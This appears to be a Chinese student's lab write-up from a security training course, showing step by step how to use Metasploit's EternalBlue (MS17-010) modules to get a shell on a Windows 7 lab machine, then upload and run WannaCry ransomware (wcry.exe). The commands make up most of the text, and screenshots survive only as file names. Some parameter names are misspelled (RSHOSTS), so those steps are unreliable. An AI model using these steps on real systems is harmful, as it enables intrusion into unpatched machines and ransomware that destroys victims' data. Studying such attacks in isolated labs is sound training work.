信息系统安全实训第一天

玩转勒索病毒—通过永恒之蓝连接Windows并远程上传病毒

  1. 查看Windows 7 ip地址

image-20210621152859279

  1. 测试kali能否ping通10.211.55.9

image-2021062115309643

  1. 开启永恒之蓝

image-20210621153339574

  1. 搜索模块
1
search ms17

image-20210621153617736

  1. 选择6
1
use 6

然后查看改模块一些参数设置

image-20210621154610211

RHOSTS:要攻击靶机的ip

RPORT:攻击靶机开放的端口

  1. 这里我们将RHOSTS 设置为 Windows 7 的ip地址
1
set RHOSTS 10.211.55.9

image-2010621154851902

  1. 然后run,就是更新设置

image-2010621155008251

以同样的方式设置模块8的RSHOTS,将其设置为靶机的ip(Windows 7)

1
2
3
4
use 8
show options#一定注意它的RSHOSTS值
set RSHOSTS 10.211.55.9
run

image-20210621160058314

在底部出现这个标志即为成功

  1. 然后shell 如果乱码的话在输入 chcp 65001

image-2021062115560843

  1. 然后将事先准备好的勒索病毒上传到Windows 7 上
1
upload kali路径 Windows路径

image-2021021155809721

  1. 会发现在Windows 7 c:\ 路径下有了该文件,然后远程运行该文件
1
execute -f c:\\wcry.exe

image-20210621160508103

回过头看自己的靶机

image-20210621160530723

攻击成功!